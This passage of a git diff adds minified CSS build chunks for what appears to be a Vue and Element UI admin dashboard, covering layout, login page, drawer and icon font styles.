16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-0fc1bbd0]{width:250px;height:50px}.clear[data-v-0fc1bbd0]{clear:both}.box-card[data-v-0fc1bbd0]{margin-top:10px}.sp[data-v-0fc1bbd0]{float:left}.creatsource[data-v-0fc1bbd0]{float:left;margin-right:20px}.xg[data-v-0fc1bbd0]{margin-left:150px;margin-top:100px}.fh[data-v-0fc1bbd0]{margin-top:70px;margin-left:400px}.desc[data-v-0fc1bbd0]{margin-left:50px;margin-top:50px}.shenglue[data-v-0fc1bbd0]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-0fc1bbd0]{margin-bottom:-10px}.mtcall[data-v-0fc1bbd0]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-0fc1bbd0]{width:400px;text-align:center}.zzc[data-v-0fc1bbd0]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-0fc1bbd0]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-0fc1bbd0]{margin-left:10px}.mt5[data-v-0fc1bbd0]{border:none;color:#2684ff}.m1[data-v-0fc1bbd0]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-0fc1bbd0]{margin-top:30px;margin-left:30px}.ml10[data-v-0fc1bbd0]{margin-left:10px}.ml20[data-v-0fc1bbd0]{margin-left:30px}.mqo[data-v-0fc1bbd0]{margin-top:8px;margin-right:8px}.demo-drawer__content[data-v-0fc1bbd0]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-0fc1bbd0]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-0fc1bbd0]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer .dropdown[data-v-0fc1bbd0],.demo-drawer__footer button[data-v-0fc1bbd0]{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-tag--small[data-v-0fc1bbd0]{margin:2px}.tip[data-v-0fc1bbd0]{padding:8px 16px;background-color:#ecf8ff;border-radius:4px;border-left:5px solid #50bfff;margin:20px 0}.sbadge[data-v-0fc1bbd0]{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:middle;background-color:#777;border-radius:10px}.dashboard-container[data-v-0fc1bbd0]{margin:30px}.dashboard-text[data-v-0fc1bbd0]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-5ddacc57.f0aa6000.css b/frontend/dist/static/css/chunk-5ddacc57.f0aa6000.css new file mode 100644 index 0000000..32d06a5 --- /dev/null +++ b/frontend/dist/static/css/chunk-5ddacc57.f0aa6000.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.elfrom[data-v-7ac478de]{margin-top:20px;margin-left:20px}.sbzj[data-v-7ac478de]{margin-left:150px;margin-top:50px}.bao[data-v-7ac478de]{margin-left:25px}.ipt[data-v-7ac478de]{width:190px}.hl[data-v-7ac478de]{margin-left:40px}.fh[data-v-7ac478de]{margin-top:70px;margin-left:370px}.desc[data-v-7ac478de]{margin-left:50px;margin-top:10px}.shenglue[data-v-7ac478de]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-7ac478de]{margin-bottom:-10px}.mtcall[data-v-7ac478de]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-7ac478de]{width:400px;text-align:center}.zzc[data-v-7ac478de]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-7ac478de]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-7ac478de]{margin-left:10px}.mt5[data-v-7ac478de]{border:none;color:#2684ff}.m1[data-v-7ac478de]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-7ac478de]{margin-top:30px;margin-left:30px}.ml10[data-v-7ac478de]{margin-left:10px}.ml20[data-v-7ac478de]{margin-left:30px}.mqo[data-v-7ac478de]{margin-top:8px;margin-right:8px}.el-table td,.el-table th{padding:5px 0}.el-table--medium th{padding:6px 0}.el-table--border th{padding:3px}// 抽屉 .el-drawer__body{padding:20px}.demo-drawer__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer button{-webkit-box-flex:1;-ms-flex:1;flex:1}.dashboard-container[data-v-7ac478de]{margin:30px}.dashboard-text[data-v-7ac478de]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-64a7f1ba.bff369fd.css b/frontend/dist/static/css/chunk-64a7f1ba.bff369fd.css new file mode 100644 index 0000000..4233fd3 --- /dev/null +++ b/frontend/dist/static/css/chunk-64a7f1ba.bff369fd.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-6ab2272c]{width:250px;height:50px}.clear[data-v-6ab2272c]{clear:both}.box-card[data-v-6ab2272c]{margin-top:10px}.sp[data-v-6ab2272c]{float:left}.creatsource[data-v-6ab2272c]{float:left;margin-right:20px}.xg[data-v-6ab2272c]{margin-left:150px;margin-top:100px}.fh[data-v-6ab2272c]{margin-top:70px;margin-left:400px}.desc[data-v-6ab2272c]{margin-left:50px;margin-top:50px}.shenglue[data-v-6ab2272c]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-6ab2272c]{margin-bottom:-10px}.mtcall[data-v-6ab2272c]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-6ab2272c]{width:400px;text-align:center}.zzc[data-v-6ab2272c]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-6ab2272c]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-6ab2272c]{margin-left:10px}.mt5[data-v-6ab2272c]{border:none;color:#2684ff}.m1[data-v-6ab2272c]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-6ab2272c]{margin-top:30px;margin-left:30px}.ml10[data-v-6ab2272c]{margin-left:10px}.ml20[data-v-6ab2272c]{margin-left:30px}.mqo[data-v-6ab2272c]{margin-top:8px;margin-right:8px}.demo-drawer__content[data-v-6ab2272c]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-6ab2272c]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-6ab2272c]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer .dropdown[data-v-6ab2272c],.demo-drawer__footer button[data-v-6ab2272c]{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-tag--small[data-v-6ab2272c]{margin:2px}.tip[data-v-6ab2272c]{padding:8px 16px;background-color:#ecf8ff;border-radius:4px;border-left:5px solid #50bfff;margin:20px 0}.sbadge[data-v-6ab2272c]{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:middle;background-color:#777;border-radius:10px}.dashboard-container[data-v-6ab2272c]{margin:30px}.dashboard-text[data-v-6ab2272c]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-66836180.69a642af.css b/frontend/dist/static/css/chunk-66836180.69a642af.css new file mode 100644 index 0000000..81cacf6 --- /dev/null +++ b/frontend/dist/static/css/chunk-66836180.69a642af.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.headers[data-v-0366d15a]{margin-top:-20px}.input-wd[data-v-0366d15a]{margin-top:10px}.el-table td,.el-table th{padding:5px 0}.el-table--medium th{padding:6px 0}.el-table--border th{padding:3px}.dashboard-container[data-v-0366d15a]{margin:30px}.dashboard-text[data-v-0366d15a]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-766e5a01.b59770a9.css b/frontend/dist/static/css/chunk-766e5a01.b59770a9.css new file mode 100644 index 0000000..d92ba0f --- /dev/null +++ b/frontend/dist/static/css/chunk-766e5a01.b59770a9.css @@ -0,0 +1 @@ +@supports(-webkit-mask:none) and (not (cater-color:#fff)){.login-container .el-input input{color:#fff}}.login-container .el-input{display:inline-block;height:47px;width:85%}.login-container .el-input input{background:transparent;border:0;-webkit-appearance:none;border-radius:0;padding:12px 5px 12px 15px;color:#fff;height:47px;caret-color:#fff}.login-container .el-input input:-webkit-autofill{-webkit-box-shadow:0 0 0 1000px #283443 inset!important;box-shadow:inset 0 0 0 1000px #283443!important;-webkit-text-fill-color:#fff!important}.login-container .el-form-item{border:1px solid hsla(0,0%,100%,.1);background:rgba(0,0,0,.1);border-radius:5px;color:#454545}.login-container[data-v-0b594fea]{min-height:100%;width:100%;background-color:#2d3a4b;overflow:hidden}.login-container .login-form[data-v-0b594fea]{position:relative;width:520px;max-width:100%;padding:160px 35px 0;margin:0 auto;overflow:hidden}.login-container .tips[data-v-0b594fea]{font-size:14px;color:#fff;margin-bottom:10px}.login-container .tips span[data-v-0b594fea]:first-of-type{margin-right:16px}.login-container .svg-container[data-v-0b594fea]{padding:6px 5px 6px 15px;color:#889aa4;vertical-align:middle;width:30px;display:inline-block}.login-container .title-container[data-v-0b594fea]{position:relative}.login-container .title-container .title[data-v-0b594fea]{font-size:26px;color:#eee;margin:0 auto 40px auto;text-align:center;font-weight:700}.login-container .show-pwd[data-v-0b594fea]{position:absolute;right:10px;top:7px;font-size:16px;color:#889aa4;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-7a763d7c.7e0fa689.css b/frontend/dist/static/css/chunk-7a763d7c.7e0fa689.css new file mode 100644 index 0000000..2735ec8 --- /dev/null +++ b/frontend/dist/static/css/chunk-7a763d7c.7e0fa689.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-63366fdc]{width:250px;height:50px}.clear[data-v-63366fdc]{clear:both}.box-card[data-v-63366fdc]{margin-top:10px}.sp[data-v-63366fdc]{float:left}.creatsource[data-v-63366fdc]{float:left;margin-right:20px}.xg[data-v-63366fdc]{margin-left:150px;margin-top:100px}.fh[data-v-63366fdc]{margin-top:70px;margin-left:400px}.desc[data-v-63366fdc]{margin-left:50px;margin-top:50px}.shenglue[data-v-63366fdc]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-63366fdc]{margin-bottom:-10px}.mtcall[data-v-63366fdc]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-63366fdc]{width:400px;text-align:center}.zzc[data-v-63366fdc]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-63366fdc]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-63366fdc]{margin-left:10px}.mt5[data-v-63366fdc]{border:none;color:#2684ff}.m1[data-v-63366fdc]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-63366fdc]{margin-top:30px;margin-left:30px}.ml10[data-v-63366fdc]{margin-left:10px}.ml20[data-v-63366fdc]{margin-left:30px}.mqo[data-v-63366fdc]{margin-top:8px;margin-right:8px}.demo-drawer__content[data-v-63366fdc]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-63366fdc]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-63366fdc]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer button[data-v-63366fdc]{-webkit-box-flex:1;-ms-flex:1;flex:1} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-7ee29dac.d25b9421.css b/frontend/dist/static/css/chunk-7ee29dac.d25b9421.css new file mode 100644 index 0000000..2de8279 --- /dev/null +++ b/frontend/dist/static/css/chunk-7ee29dac.d25b9421.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.ipt[data-v-48453f3c]{width:250px;height:50px}.clear[data-v-48453f3c]{clear:both}.box-card[data-v-48453f3c]{margin-top:10px}.sp[data-v-48453f3c]{float:left}.creatsource[data-v-48453f3c]{float:left;margin-right:20px}.xg[data-v-48453f3c]{margin-left:150px;margin-top:100px}.fh[data-v-48453f3c]{margin-top:70px;margin-left:400px}.desc[data-v-48453f3c]{margin-left:50px;margin-top:50px}.shenglue[data-v-48453f3c]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-48453f3c]{margin-bottom:-10px}.mtcall[data-v-48453f3c]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-48453f3c]{width:400px;text-align:center}.zzc[data-v-48453f3c]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-48453f3c]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-48453f3c]{margin-left:10px}.mt5[data-v-48453f3c]{border:none;color:#2684ff}.m1[data-v-48453f3c]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-48453f3c]{margin-top:30px;margin-left:30px}.ml10[data-v-48453f3c]{margin-left:10px}.ml20[data-v-48453f3c]{margin-left:30px}.mqo[data-v-48453f3c]{margin-top:8px;margin-right:8px}.demo-drawer__content[data-v-48453f3c]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-48453f3c]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-48453f3c]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer .dropdown[data-v-48453f3c],.demo-drawer__footer button[data-v-48453f3c]{-webkit-box-flex:1;-ms-flex:1;flex:1}.el-tag--small[data-v-48453f3c]{margin:2px}.tip[data-v-48453f3c]{padding:8px 16px;background-color:#ecf8ff;border-radius:4px;border-left:5px solid #50bfff;margin:20px 0}.dashboard-container[data-v-48453f3c]{margin:30px}.dashboard-text[data-v-48453f3c]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-e321b978.17f9cad1.css b/frontend/dist/static/css/chunk-e321b978.17f9cad1.css new file mode 100644 index 0000000..f99804a --- /dev/null +++ b/frontend/dist/static/css/chunk-e321b978.17f9cad1.css @@ -0,0 +1 @@ +.pagination-container[data-v-72c6b867]{background:#fff;padding:32px 16px}.pagination-container.hidden[data-v-72c6b867]{display:none}.fr[data-v-64e4c139]{margin-top:20px}.elfrom[data-v-64e4c139],.row_pop[data-v-64e4c139]{margin-left:20px}.xg[data-v-64e4c139]{margin-left:330px;margin-top:100px}.fh[data-v-64e4c139]{margin-top:70px;margin-left:400px}.desc[data-v-64e4c139]{margin-left:50px;margin-top:50px}.shenglue[data-v-64e4c139]{cursor:pointer;overflow:hidden;-webkit-line-clamp:2;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical}.xx[data-v-64e4c139]{margin-bottom:-10px}.mtcall[data-v-64e4c139]{margin-bottom:10px;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.footer[data-v-64e4c139]{width:400px;text-align:center}.zzc[data-v-64e4c139]{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0}.zzc[data-v-64e4c139]:hover{background:hsla(0,0%,96.9%,.98);font-size:14px;z-index:1000;opacity:.8;cursor:pointer;margin:0;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#2684ff}.mt4[data-v-64e4c139]{margin-left:10px}.mt5[data-v-64e4c139]{border:none;color:#2684ff}.m1[data-v-64e4c139]{margin-top:10px;margin-left:10px}.dashboard-container[data-v-64e4c139]{margin-top:30px;margin-left:30px}.ml10[data-v-64e4c139]{margin-left:10px}.ml20[data-v-64e4c139]{margin-left:30px}.mqo[data-v-64e4c139]{margin-top:8px;margin-right:8px}.el-drawer__body[data-v-64e4c139]{padding:20px}.demo-drawer__content[data-v-64e4c139]{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;height:98%;margin:5px}.demo-drawer__content form[data-v-64e4c139]{-webkit-box-flex:1;-ms-flex:1;flex:1}.demo-drawer__footer[data-v-64e4c139]{display:-webkit-box;display:-ms-flexbox;display:flex}.demo-drawer__footer button[data-v-64e4c139]{-webkit-box-flex:1;-ms-flex:1;flex:1}.sbadge[data-v-64e4c139]{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:middle;background-color:#777;border-radius:10px}.dashboard-container[data-v-64e4c139]{margin:30px}.dashboard-text[data-v-64e4c139]{font-size:30px;line-height:46px} \ No newline at end of file diff --git a/frontend/dist/static/css/chunk-elementUI.f92cd1c5.css b/frontend/dist/static/css/chunk-elementUI.f92cd1c5.css new file mode 100644 index 0000000..177d6d2 --- /dev/null +++ b/frontend/dist/static/css/chunk-elementUI.f92cd1c5.css @@ -0,0 +1 @@ +@font-face{font-family:element-icons;src:url(../../static/fonts/element-icons.535877f5.woff) format("woff"),url(../../static/fonts/element-icons.732389de.ttf) format("truetype");font-weight:400;font-display:"auto";font-style:normal}[class*=" el-icon-"],[class^=el-icon-]{font-family:element-icons!important;speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;line-height:1;vertical-align:baseline;display:inline-block;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.el-icon-ice-cream-round:before{content:"\e6a0"}.el-icon-ice-cream-square:before{content:"\e6a3"}.el-icon-lollipop:before{content:"\e6a4"}.el-icon-potato-strips:before{content:"\e6a5"}.el-icon-milk-tea:before{content:"\e6a6"}.el-icon-ice-drink:before{content:"\e6a7"}.el-icon-ice-tea:before{content:"\e6a9"}.el-icon-coffee:before{content:"\e6aa"}.el-icon-orange:before{content:"\e6ab"}.el-icon-pear:before{content:"\e6ac"}.el-icon-apple:before{content:"\e6ad"}.el-icon-cherry:before{content:"\e6ae"}.el-icon-watermelon:before{content:"\e6af"}.el-icon-grape:before{content:"\e6b0"}.el-icon-refrigerator:before{content:"\e6b1"}.el-icon-goblet-square-full:before{content:"\e6b2"}.el-icon-goblet-square:before{content:"\e6b3"}.el-icon-goblet-full:before{content:"\e6b4"}.el-icon-goblet:before{content:"\e6b5"}.el-icon-cold-drink:before{content:"\e6b6"}.el-icon-coffee-cup:before{content:"\e6b8"}.el-icon-water-cup:before{content:"\e6b9"}.el-icon-hot-water:before{content:"\e6ba"}.el-icon-ice-cream:before{content:"\e6bb"}.el-icon-dessert:before{content:"\e6bc"}.el-icon-sugar:before{content:"\e6bd"}.el-icon-tableware:before{content:"\e6be"}.el-icon-burger:before{content:"\e6bf"}.el-icon-knife-fork:before{content:"\e6c1"}.el-icon-fork-spoon:before{content:"\e6c2"}.el-icon-chicken:before{content:"\e6c3"}.el-icon-food:before{content:"\e6c4"}.el-icon-dish-1:before{content:"\e6c5"}.el-icon-dish:before{content:"\e6c6"}.el-icon-moon-night:before{content:"\e6ee"}.el-icon-moon:before{content:"\e6f0"}.el-icon-cloudy-and-sunny:before{content:"\e6f1"}.el-icon-partly-cloudy:before{content:"\e6f2"}.el-icon-cloudy:before{content:"\e6f3"}.el-icon-sunny:before{content:"\e6f6"}.el-icon-sunset:before{content:"\e6f7"}.el-icon-sunrise-1:before{content:"\e6f8"}.el-icon-sunrise:before{content:"\e6f9"}.el-icon-heavy-rain:before{content:"\e6fa"}.el-icon-lightning:before{content:"\e6fb"}.el-icon-light-rain:before{content:"\e6fc"}.el-icon-wind-power:before{content:"\e6fd"}.el-icon-baseball:before{content:"\e712"}.el-icon-soccer:before{content:"\e713"}.el-icon-football:before{content:"\e715"}.el-icon-basketball:before{content:"\e716"}.el-icon-ship:before{content:"\e73f"}.el-icon-truck:before{content:"\e740"}.el-icon-bicycle:before{content:"\e741"}.el-icon-mobile-phone:before{content:"\e6d3"}.el-icon-service:before{content:"\e6d4"}.el-icon-key:before{content:"\e6e2"}.el-icon-unlock:before{content:"\e6e4"}.el-icon-lock:before{content:"\e6e5"}.el-icon-watch:before{content:"\e6fe"}.el-icon-watch-1:before{content:"\e6ff"}.el-icon-timer:before{content:"\e702"}.el-icon-alarm-clock:before{content:"\e703"}.el-icon-map-location:before{content:"\e704"}.el-icon-delete-location:before{content:"\e705"}.el-icon-add-location:before{content:"\e706"}.el-icon-location-information:before{content:"\e707"}.el-icon-location-outline:before{content:"\e708"}.el-icon-location:before{content:"\e79e"}.el-icon-place:before{content:"\e709"}.el-icon-discover:before{content:"\e70a"}.el-icon-first-aid-kit:before{content:"\e70b"}.el-icon-trophy-1:before{content:"\e70c"}.el-icon-trophy:before{content:"\e70d"}.el-icon-medal:before{content:"\e70e"}.el-icon-medal-1:before{content:"\e70f"}.el-icon-stopwatch:before{content:"\e710"}.el-icon-mic:before{content:"\e711"}.el-icon-copy-document:before{content:"\e718"}.el-icon-full-screen:before{content:"\e719"}.el-icon-switch-button:before{content:"\e71b"}.el-icon-aim:before{content:"\e71c"}.el-icon-crop:before{content:"\e71d"}.el-icon-odometer:before{content:"\e71e"}.el-icon-time:before{content:"\e71f"}.el-icon-bangzhu:before{content:"\e724"}.el-icon-close-notification:before{content:"\e726"}.el-icon-microphone:before{content:"\e727"}.el-icon-turn-off-microphone:before{content:"\e728"}.el-icon-position:before{content:"\e729"}.el-icon-postcard:before{content:"\e72a"}.el-icon-message:before{content:"\e72b"}.el-icon-chat-line-square:before{content:"\e72d"}.el-icon-chat-dot-square:before{content:"\e72e"}.el-icon-chat-dot-round:before{content:"\e72f"}.el-icon-chat-square:before{content:"\e730"}.el-icon-chat-line-round:before{content:"\e731"}.el-icon-chat-round:before{content:"\e732"}.el-icon-set-up:before{content:"\e733"}.el-icon-turn-off:before{content:"\e734"}.el-icon-open:before{content:"\e735"}.el-icon-connection:before{content:"\e736"}.el-icon-link:before{content:"\e737"}.el-icon-cpu:before{content:"\e738"}.el-icon-thumb:before{content:"\e739"}.el-icon-female:before{content:"\e73a"}.el-icon-male:before{content:"\e73b"}.el-icon-guide:before{content:"\e73c"}.el-icon-news:before{content:"\e73e"}.el-icon-price-tag:before{content:"\e744"}.el-icon-discount:before{content:"\e745"}.el-icon-wallet:before{content:"\e747"}.el-icon-coin:before{content:"\e748"}.el-icon-money:before{content:"\e749"}.el-icon-bank-card:before{content:"\e74a"}.el-icon-box:before{content:"\e74b"}.el-icon-present:before{content:"\e74c"}.el-icon-sell:before{content:"\e6d5"}.el-icon-sold-out:before{content:"\e6d6"}.el-icon-shopping-bag-2:before{content:"\e74d"}.el-icon-shopping-bag-1:before{content:"\e74e"}.el-icon-shopping-cart-2:before{content:"\e74f"}.el-icon-shopping-cart-1:before{content:"\e750"}.el-icon-shopping-cart-full:before{content:"\e751"}.el-icon-smoking:before{content:"\e752"}.el-icon-no-smoking:before{content:"\e753"}.el-icon-house:before{content:"\e754"}.el-icon-table-lamp:before{content:"\e755"}.el-icon-school:before{content:"\e756"}.el-icon-office-building:before{content:"\e757"}.el-icon-toilet-paper:before{content:"\e758"}.el-icon-notebook-2:before{content:"\e759"}.el-icon-notebook-1:before{content:"\e75a"}.el-icon-files:before{content:"\e75b"}.el-icon-collection:before{content:"\e75c"}.el-icon-receiving:before{content:"\e75d"}.el-icon-suitcase-1:before{content:"\e760"}.el-icon-suitcase:before{content:"\e761"}.el-icon-film:before{content:"\e763"}.el-icon-collection-tag:before{content:"\e765"}.el-icon-data-analysis:before{content:"\e766"}.el-icon-pie-chart:before{content:"\e767"}.el-icon-data-board:before{content:"\e768"}.el-icon-data-line:before{content:"\e76d"}.el-icon-reading:before{content:"\e769"}.el-icon-magic-stick:before{content:"\e76a"}.el-icon-coordinate:before{content:"\e76b"}.el-icon-mouse:before{content:"\e76c"}.el-icon-brush:before{content:"\e76e"}.el-icon-headset:before{content:"\e76f"}.el-icon-umbrella:before{content:"\e770"}.el-icon-scissors:before{content:"\e771"}.el-icon-mobile:before{content:"\e773"}.el-icon-attract:before{content:"\e774"}.el-icon-monitor:before{content:"\e775"}.el-icon-search:before{content:"\e778"}.el-icon-takeaway-box:before{content:"\e77a"}.el-icon-paperclip:before{content:"\e77d"}.el-icon-printer:before{content:"\e77e"}.el-icon-document-add:before{content:"\e782"}.el-icon-document:before{content:"\e785"}.el-icon-document-checked:before{content:"\e786"}.el-icon-document-copy:before{content:"\e787"}.el-icon-document-delete:before{content:"\e788"}.el-icon-document-remove:before{content:"\e789"}.el-icon-tickets:before{content:"\e78b"}.el-icon-folder-checked:before{content:"\e77f"}.el-icon-folder-delete:before{content:"\e780"}.el-icon-folder-remove:before{content:"\e781"}.el-icon-folder-add:before{content:"\e783"}.el-icon-folder-opened:before{content:"\e784"}.el-icon-folder:before{content:"\e78a"}.el-icon-edit-outline:before{content:"\e764"}.el-icon-edit:before{content:"\e78c"}.el-icon-date:before{content:"\e78e"}.el-icon-c-scale-to-original:before{content:"\e7c6"}.el-icon-view:before{content:"\e6ce"}.el-icon-loading:before{content:"\e6cf"}.el-icon-rank:before{content:"\e6d1"}.el-icon-sort-down:before{content:"\e7c4"}.el-icon-sort-up:before{content:"\e7c5"}.el-icon-sort:before{content:"\e6d2"}.el-icon-finished:before{content:"\e6cd"}.el-icon-refresh-left:before{content:"\e6c7"}.el-icon-refresh-right:before{content:"\e6c8"}.el-icon-refresh:before{content:"\e6d0"}.el-icon-video-play:before{content:"\e7c0"}.el-icon-video-pause:before{content:"\e7c1"}.el-icon-d-arrow-right:before{content:"\e6dc"}.el-icon-d-arrow-left:before{content:"\e6dd"}.el-icon-arrow-up:before{content:"\e6e1"}.el-icon-arrow-down:before{content:"\e6df"}.el-icon-arrow-right:before{content:"\e6e0"}.el-icon-arrow-left:before{content:"\e6de"}.el-icon-top-right:before{content:"\e6e7"}.el-icon-top-left:before{content:"\e6e8"}.el-icon-top:before{content:"\e6e6"}.el-icon-bottom:before{content:"\e6eb"}.el-icon-right:before{content:"\e6e9"}.el-icon-back:before{content:"\e6ea"}.el-icon-bottom-right:before{content:"\e6ec"}.el-icon-bottom-left:before{content:"\e6ed"}.el-icon-caret-top:before{content:"\e78f"}.el-icon-caret-bottom:before{content:"\e790"}.el-icon-caret-right:before{content:"\e791"}.el-icon-caret-left:before{content:"\e792"}.el-icon-d-caret:before{content:"\e79a"}.el-icon-share:before{content:"\e793"}.el-icon-menu:before{content:"\e798"}.el-icon-s-grid:before{content:"\e7a6"}.el-icon-s-check:before{content:"\e7a7"}.el-icon-s-data:before{content:"\e7a8"}.el-icon-s-opportunity:before{content:"\e7aa"}.el-icon-s-custom:before{content:"\e7ab"}.el-icon-s-claim:before{content:"\e7ad"}.el-icon-s-finance:before{content:"\e7ae"}.el-icon-s-comment:before{content:"\e7af"}.el-icon-s-flag:before{content:"\e7b0"}.el-icon-s-marketing:before{content:"\e